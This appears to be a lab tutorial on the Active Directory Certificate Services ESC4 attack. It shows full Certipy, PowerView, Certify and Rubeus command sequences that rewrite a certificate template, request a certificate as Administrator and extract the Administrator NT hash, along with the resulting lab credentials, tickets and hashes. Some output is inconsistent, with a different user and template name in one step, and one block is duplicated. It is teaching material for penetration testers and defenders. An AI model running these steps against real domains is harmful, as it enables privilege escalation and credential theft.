ESC4
Understanding ESC4 - Vulnerable Certificate Template Access Control
Access control attacks exploit misconfigurations in the Certificate Authority or certificate templates' discretionary access control lists (DACLs), which allow low-privileged users to perform sensitive tasks on the CA or the objects that compose it.
When we have elevated privileges over an object in Active Directory, we can perform different actions that allow us to escalate privileges. For example, if we have Full Control over a user account we can reset the user's password or change specific properties to perform other attacks, allowing us to gain control over the user.
Certificate templates function as securable entities within Active Directory, possessing a security descriptor that dictates the specific permissions granted to various AD principals over the template.
A template is deemed misconfigured at the access control level when it contains Access Control Entries (ACEs) that inadvertently grant editing permissions to unintended or otherwise unprivileged AD principals, potentially allowing them to modify sensitive security settings within the template. If we have the appropriate rights over a template, we can make it vulnerable to attacks such as ESC1.
ESC4 Abuse Requirements
To execute an ESC4 attack, having powerful rights over the certificate templates is necessary. By manipulating these objects, we can introduce a misconfiguration to a template that is not vulnerable. One example is enabling the mspki-certificate-name-flag flag for a template that allows domain authentication. This results in a similar domain compromise scenario as ESC1, where low-privileged users can specify an arbitrary Subject Alternative Name and authenticate as someone else.
To make a template vulnerable, the following attributes need to be modified with the specified values:
-
Grant Enrollment rights for the vulnerable template.
-
Disable the
PEND_ALL_REQUESTSflag inmspki-enrollment-flagto deactivate Manager Approval. -
Set the
mspki-ra-signatureattribute to0to disable theAuthorized Signature requirement. -
Enable the
ENROLLEE_SUPPLIES_SUBJECTflag inmspki-certificate-name-flagto allow requesting users to specify another privileged account name as aSAN. -
Set the
mspki-certificate-application-policyto a certificate purpose for authentication:- Client Authentication (OID: 1.3.6.1.5.5.7.3.2)
- Smart Card Logon (OID: 1.3.6.1.4.1.311.20.2.2)
- PKINIT Client Authentication (OID: 1.3.6.1.5.2.3.4)
- Any Purpose (OID: 2.5.29.37.0)
- No Extended Key Usage (EKU)
ESC4 Enumeration and Attack
We will discuss how to enumerate and abuse ESC4 from Linux and Windows.
ESC4 Enumeration from Linux
Let's use certipy to find vulnerable templates, and let's focus on the template ESC4:
Certipy vulnerable certificate template enumeration
$ certipy find -u 'blwasp@lab.local' -p 'Password123!' -dc-ip 10.129.205.199 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
<SNIP>
2
Template Name : ESC4
Display Name : ESC4
Certificate Authorities : lab-LAB-DC-CA
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireDirectoryPath
SubjectRequireEmail
SubjectAltRequireEmail
SubjectAltRequireUpn
Enrollment Flag : AutoEnrollment
PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : 16777216
65536
ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 99 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : LAB.LOCAL\Domain Admins
LAB.LOCAL\Domain Users
LAB.LOCAL\Enterprise Admins
Object Control Permissions
Owner : LAB.LOCAL\Administrator
Full Control Principals : LAB.LOCAL\Black Wasp
Write Owner Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
LAB.LOCAL\Administrator
LAB.LOCAL\Black Wasp
Write Dacl Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
LAB.LOCAL\Administrator
LAB.LOCAL\Black Wasp
Write Property Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
LAB.LOCAL\Administrator
LAB.LOCAL\Black Wasp
[!] Vulnerabilities
ESC4 : 'LAB.LOCAL\\Black Wasp' has dangerous permissions
In the above output, we can see in the Object Control Permissions field that the user Black Wasp has Full Control on this template.
ESC4 Attack from Linux
To simplify the process, Certipy allows us to configure all required settings in one command if we have sufficient rights over the template. We need to use the argument template and the option -template <VULNERABLE TEMPLATE> with the name of the vulnerable template, in our case is ESC4. Additionally, we can specify the option -save-old so we can restore the template configuration once we are done with the attack:
Attacking ESC4 vulnerable template
$ certipy template -u 'BlWasp@lab.local' -p 'Password123!' -template ESC4 -save-old
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved old configuration for 'ESC4' to 'ESC4.json'
[*] Updating certificate template 'ESC4'
[*] Successfully updated 'ESC4'
The -save-old command save the old configuration to a file TEMPLATE-NAME.json, in this case, ESC4.json. This is important to notice for later on when we want to restore the template to its original configuration.
Now, let's see the new template configuration:
ESC4 Template after modification
$ certipy find -u 'blwasp@lab.local' -p 'Password123!' -dc-ip 10.129.205.199 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
<SNIP>
2
Template Name : ESC4
Display Name : ESC4
Certificate Authorities : lab-LAB-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : True
Any Purpose : True
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16777216
65536
ExportableKey
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 5 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Object Control Permissions
Owner : LAB.LOCAL\Administrator
Full Control Principals : LAB.LOCAL\Authenticated Users
Write Owner Principals : LAB.LOCAL\Authenticated Users
Write Dacl Principals : LAB.LOCAL\Authenticated Users
Write Property Principals : LAB.LOCAL\Authenticated Users
[!] Vulnerabilities
ESC1 : 'LAB.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
ESC2 : 'LAB.LOCAL\\Authenticated Users' can enroll and template can be used for any purpose
ESC3 : 'LAB.LOCAL\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set
ESC4 : 'LAB.LOCAL\\Authenticated Users' has dangerous permissions
It is possible to exploit the template with the ESC1 vulnerability and authenticate with the alternate subject.
Abusing the modified template
$ certipy req -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -template ESC4 -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 61
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Now we can retrieve the Administrator NT Hash or use the certificate to authenticate:
Retrieve Administrator NT Hash
$ certipy auth -pfx administrator.pfx -username Administrator -domain lab.local
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@lab.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@lab.local': aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe
Finally, we can revert the changes to the original state. We need to select the template name with the option -template ESC4 and the configuration we saved with the option -configuration ESC4.json:
Restore template configuration
$ certipy template -u 'BlWasp@lab.local' -p 'Password123!' -template ESC4 -configuration ESC4.json
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating certificate template 'ESC4'
[*] Successfully updated 'ESC4'
ESC4 Enumeration from Windows
Let's connect to the target computer using blwasp credentials:
Connect via RDP
$ xfreerdp /u:blwasp /p:'Password123!' /d:lab.local /v:10.129.228.236 /dynamic-resolution
[19:18:25:549] [948409:948410] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state
[19:18:25:549] [948409:948410] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr
[19:18:25:550] [948409:948410] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpsnd
[19:18:25:550] [948409:948410] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
<SNIP>
When enumerating an ADCS server for the ESC4 domain scalation scenario, we need to be aware of the user privileges in the Object Control Permission section, as Certify will not mark a template with elevated privileges as vulnerable. Still, we will have to identify it manually. We can use Certify.exe find command to display all certificates templates.
Certify templates enumeration
PS C:\Tools> .\Certify.exe find
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=lab,DC=local'
[*] Listing info about the Enterprise CA 'lab-LAB-DC-CA'
Enterprise CA Name : lab-LAB-DC-CA
DNS Hostname : LAB-DC.lab.local
FullName : LAB-DC.lab.local\lab-LAB-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=lab-LAB-DC-CA, DC=lab, DC=local
Cert Thumbprint : CF54249CAEFB0E092265BFD306940DCBABA4C9A6
Cert Serial : 16BD1CE8853DB8B5488A16757CA7C101
Cert Start Date : 26/03/2022 01:07:46
Cert End Date : 26/03/2027 01:17:46
Cert Chain : CN=lab-LAB-DC-CA,DC=lab,DC=local
[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
Allow ManageCA, ManageCertificates LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Allow ManageCA, Enroll LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
Allow ManageCA, Enroll LAB\user_manageCA S-1-5-21-2570265163-3918697770-3667495639-1194
Enrollment Agent Restrictions : None
[*] Available Certificates Templates :
<SNIP>
CA Name : LAB-DC.lab.local\lab-LAB-DC-CA
Template Name : ESC4
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Encrypting File System, Secure Email
mspki-certificate-application-policy : Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Domain Users S-1-5-21-2570265163-3918697770-3667495639-513
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
All Extended Rights : LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
Object Control Permissions
Owner : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
Full Control Principals : LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
WriteOwner Principals : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
WriteDacl Principals : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
WriteProperty Principals : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
<SNIP>
In the output above, we can see the ESC4 template. In the Object Control Permissions section, the user blwasp has Full Control over this template, meaning we can execute the ESC4 attack against this template. The following GitHub repository contains information about Abusing Weak ACL on Certificate Templates.
ESC4 Attack from Windows
Depending on the existing privileges in the certificate template, we would need to modify one or several components of it. In this case, we will show all the necessary changes to leave the template vulnerable to ESC1. We will use PowerView to perform the attack:
Import-Module PowerView
PS C:\Tools> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS C:\Tools> Import-Module .\PowerView.ps1
The first thing we will do is to add Certificate-Enrollment rights to the Domain Users group:
Add Certificate-Enrollment rights
PS C:\Tools> Add-DomainObjectAcl -TargetIdentity ESC4 -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=lab,DC=local" -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://LAB-DC.LAB.LOCAL/DC=LAB,DC=LOCAL
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=Domain Users)(name=Domain Users)(displayname=Domain Users))))
VERBOSE: [Get-DomainSearcher] search base: LDAP://LAB-DC.LAB.LOCAL/CN=Configuration,DC=lab,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=ESC4)(name=ESC4)(displayname=ESC4))))
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=Domain Users,CN=Users,DC=lab,DC=local 'All' on CN=12221497.FDC67FA30189A813651BA8B3E433ACA5,CN=OID,CN=Public Key
Services,CN=Services,CN=Configuration,DC=lab,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=Domain Users,CN=Users,DC=lab,DC=local rights GUID '0e10c968-78fb-11d2-90d4-00c04f79dc55' on CN=12221497.FDC67FA30189A813651BA8B3E433ACA5,CN=OID,CN=Public
Key Services,CN=Services,CN=Configuration,DC=lab,DC=local
VERBOSE: [Add-DomainObjectAcl] Error granting principal CN=Domain Users,CN=Users,DC=lab,DC=local 'All' on CN=12221497.FDC67FA30189A813651BA8B3E433ACA5,CN=OID,CN=Public Key
Services,CN=Services,CN=Configuration,DC=lab,DC=local : Exception calling "CommitChanges" with "0" argument(s): "Access is denied.
"
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=Domain Users,CN=Users,DC=lab,DC=local 'All' on CN=ESC4,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=Domain Users,CN=Users,DC=lab,DC=local rights GUID '0e10c968-78fb-11d2-90d4-00c04f79dc55' on CN=ESC4,CN=Certificate Templates,CN=Public Key
Services,CN=Services,CN=Configuration,DC=lab,DC=local
Next, we need to disable the manager approval requirement. According to Microsoft - msPKI-Enrollment-Flag Attribute, the PEND_ALL_REQUESTS flag bit is 0x00000002, so we need to remove this flag, we will use instead 0x00000001 that correspond to CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS and 0x00000008 which is CT_FLAG_PUBLISH_TO_DS. To set both, we need to use 0x00000009 or 9:
Disabling Manager Approval Requirement
PS C:\Tools> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local" -Identity ESC4 -Set @{'mspki-enrollment-flag'=9} -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://LAB-DC.LAB.LOCAL/CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=ESC4)(name=ESC4)(displayname=ESC4))))
VERBOSE: [Set-DomainObject] Setting 'mspki-enrollment-flag' to '9' for object ''
Now we need to disable Authorized Signature Requirement. We can set mspki-ra-signature attribute to 0:
Disabling Authorized Signature Requirement
PS C:\Tools> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local" -Identity ESC4 -Set @{'mspki-ra-signature'=0} -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://LAB-DC.LAB.LOCAL/CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=ESC4)(name=ESC4)(displayname=ESC4))))
VERBOSE: [Set-DomainObject] Setting 'mspki-ra-signature' to '0' for object ''
To make this template vulnerable to ESC1, we will need to allow requesters to specify a subjectAltName in the CSR. This setting can be controlled by flag bits in mspki-certificate-name-flag attribute. Microsoft documentation for msPKI-Certificate-Name-Flag Attribute, defines the ENROLLEE_SUPPLIES_SUBJECT flag bit is 0x00000001. To enable it, we need to set this attribute to 1:
Enabling SAN Specification
PS C:\Tools> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local" -Identity ESC4 -Set @{'mspki-certificate-name-flag'=1} -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://LAB-DC.LAB.LOCAL/CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=ESC4)(name=ESC4)(displayname=ESC4))))
VERBOSE: [Set-DomainObject] XORing 'mspki-certificate-name-flag' with '1' for object ''
The final part is to allow this certificate to be used for Client Authentication. We can set the PKI Extended Key Usage and the mspki-certificate-application-policy to the OID: 1.3.6.1.5.5.7.3.2:
Setting PKI Extended Key Usage
PS C:\Tools> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local" -Identity ESC4 -Set @{'pkiextendedkeyusage'='1.3.6.1.5.5.7.3.2'} -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://LAB-DC.LAB.LOCAL/CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=ESC4)(name=ESC4)(displayname=ESC4))))
VERBOSE: [Set-DomainObject] Setting 'pkiextendedkeyusage' to '1.3.6.1.5.5.7.3.2' for object ''
Setting mspki-certificate-application-policy
PS C:\Tools> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local" -Identity ESC4 -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://LAB-DC.LAB.LOCAL/CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=ESC4)(name=ESC4)(displayname=ESC4))))
VERBOSE: [Set-DomainObject] Setting 'mspki-certificate-application-policy' to '1.3.6.1.5.5.7.3.2' for object ''
If we now run Certify with the vulnerable option, we will get the ESC4 template too:
Finding vulnerable templates
PS C:\Tools> .\Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[!] Vulnerable Certificates Templates :
<SNIP>
CA Name : LAB-DC.lab.local\lab-LAB-DC-CA
Template Name : ESC4
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication
mspki-certificate-application-policy : Client Authentication
Permissions
Enrollment Permissions
Enrollment Rights : LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Domain Users S-1-5-21-2570265163-3918697770-3667495639-513
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
All Extended Rights : LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
Object Control Permissions
Owner : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
Full Control Principals : LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
WriteOwner Principals : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
WriteDacl Principals : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
WriteProperty Principals : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
<SNIP>
Now let's request the certificate and save it in a file named admin-esc4.pem:
Certificate Request with alternative SAN
PS C:\Tools> .\Certify.exe request /ca:LAB-DC\lab-LAB-DC-CA /template:ESC4 /altname:Administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : LAB\grace
[*] No subject name specified, using current context as subject.
[*] Template : ESC1
[*] Subject : CN=Grace Start, CN=Users, DC=lab, DC=local
[*] AltName : administrator@lab.local
[*] Certificate Authority : LAB-DC.lab.local\lab-LAB-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 58
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAsrll8PDAN0okTiQRzYX1lsbU5D9nazZX4O0lAehrddfPZbJH
8gI37syxrjmlgYOwumXOeHf5Q1o9iQgfXDg0/60uS2+P6ZzbPmSrYLpaE5ougrPw
RvswDeeEMYfrDElQ3TLno1qvpQkce1iawndc+pM/AmMbpJvg7YEy1BJN2z8nYVkV
6TQq3ggMVKIcuIJeOlHX+wV47n/xhFmDqHTd6+VNsn01g2kyR6tsUyhh/JfjrPoU
2o2It9gtcyb0dHeJQPPTsOk/9b9r96ncHw4dNNhWNcd66OHPR9cAgqBO7M7lMjKp
B2pW6cXaf4b6J84IYpDovVwvh4mE+yqk0FMDJQIDAQABAoIBAAYXn8v4yPSZiGdJ
<SNIP>
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:04.1419031
Next, we must use OpenSSL and convert the certificate to pfx format. Let's save the output in a file named admin-esc4.pem and convert it to admin-esc4.pfx:
Convert Certificate
PS C:\Tools> & "C:\Program Files\OpenSSL-Win64\bin\openssl.exe" pkcs12 -in admin-esc4.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out admin-esc4.pfx
Enter Export Password:
Verifying - Enter Export Password:
Now, we can authenticate using Rubeus and the certificate we generated. We will use the parameter asktgt followed by the option /user:Administrator, which is the user we added the alternative SAN, the certificate file with the option /certificate:admin-esc4.pfx, and /getcredentials to retrieve the NT hash:
Certificate Authentication
PS C:\Tools> .\Rubeus.exe asktgt /user:administrator /certificate:admin-esc4.pfx /getcredentials
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Black Wasp, CN=Users, DC=lab, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'lab.local\administrator'
[*] Using domain controller: fe80::42d5:b682:fe30:8453%18:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGQjCCBj6gAwIBBaEDAgEWooIFWzCCBVdhggVTMIIFT6ADAgEFoQsbCUxBQi5MT0NBTKIeMBygAwIB
AqEVMBMbBmtyYnRndBsJbGFiLmxvY2Fso4IFGTCCBRWgAwIBEqEDAgECooIFBwSCBQM92Iu/a6xQue9F
74688JB9XlNJdBcv+fOqSgjmgBMAlnp4Ch3k0tOcP33kcZgO7NG1Wyc9M1gKxlw/rG/c2BrxVPTrgCb4
y6DRnBVjxs5VWT6KEK7vJeRcuu4qE5DB97iKpkHTg+s7QsHEMC/uf7ASn8krj+piYkthng4zpAc9/Z5e
Ac8O5yB7XnHaqK9ob7oot5piHJMROv1PH60HA1SQZHhK6MxID28nJjeGtg8TTH9bnkpnAyymnTg/y58E
2sXyqwGJeSmUnbv07ZEvujCEDShvGwBKayBHekF5gwRbRCezL9Yr8moLCf2Pv7Fy7Eix/oaQ4QQUatKi
53+hT+aQn8IHFboGJQwFnpupGN6/lFi/LKyZDibv6fjOn7qur2uMU/iulVFRr8E+foDFjGjFpDcRk5go
ZLxYpGWSvFLiyNPbcU8OxPvpklH9S4q+cesxQ2CAi6jZD3AL4A0Xn3u6xVvbudnQ8VFivEiUfo9tmafS
<SNIP>
ServiceName : krbtgt/lab.local
ServiceRealm : LAB.LOCAL
UserName : administrator (NT_PRINCIPAL)
UserRealm : LAB.LOCAL
StartTime : 20/11/2023 23:52:52
EndTime : 21/11/2023 09:52:52
RenewTill : 27/11/2023 23:52:52
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : 9WJNhDk0VPXy9KrKX3fs9w==
ASREP (key) : 61FE317BC89BC6EB06524E5421986165
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 2B576ACBE6BCFDA7294D6BD18041B8FE
PS C:\Tools> .\Rubeus.exe asktgt /user:administrator /certificate:admin-esc4.pfx /getcredentials
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Black Wasp, CN=Users, DC=lab, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'lab.local\administrator'
[*] Using domain controller: fe80::42d5:b682:fe30:8453%18:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGQjCCBj6gAwIBBaEDAgEWooIFWzCCBVdhggVTMIIFT6ADAgEFoQsbCUxBQi5MT0NBTKIeMBygAwIB
AqEVMBMbBmtyYnRndBsJbGFiLmxvY2Fso4IFGTCCBRWgAwIBEqEDAgECooIFBwSCBQM92Iu/a6xQue9F
74688JB9XlNJdBcv+fOqSgjmgBMAlnp4Ch3k0tOcP33kcZgO7NG1Wyc9M1gKxlw/rG/c2BrxVPTrgCb4
y6DRnBVjxs5VWT6KEK7vJeRcuu4qE5DB97iKpkHTg+s7QsHEMC/uf7ASn8krj+piYkthng4zpAc9/Z5e
Ac8O5yB7XnHaqK9ob7oot5piHJMROv1PH60HA1SQZHhK6MxID28nJjeGtg8TTH9bnkpnAyymnTg/y58E
2sXyqwGJeSmUnbv07ZEvujCEDShvGwBKayBHekF5gwRbRCezL9Yr8moLCf2Pv7Fy7Eix/oaQ4QQUatKi
53+hT+aQn8IHFboGJQwFnpupGN6/lFi/LKyZDibv6fjOn7qur2uMU/iulVFRr8E+foDFjGjFpDcRk5go
ZLxYpGWSvFLiyNPbcU8OxPvpklH9S4q+cesxQ2CAi6jZD3AL4A0Xn3u6xVvbudnQ8VFivEiUfo9tmafS
<SNIP>
ServiceName : krbtgt/lab.local
ServiceRealm : LAB.LOCAL
UserName : administrator (NT_PRINCIPAL)
UserRealm : LAB.LOCAL
StartTime : 20/11/2023 23:52:52
EndTime : 21/11/2023 09:52:52
RenewTill : 27/11/2023 23:52:52
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : 9WJNhDk0VPXy9KrKX3fs9w==
ASREP (key) : 61FE317BC89BC6EB06524E5421986165
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 2B576ACBE6BCFDA7294D6BD18041B8FE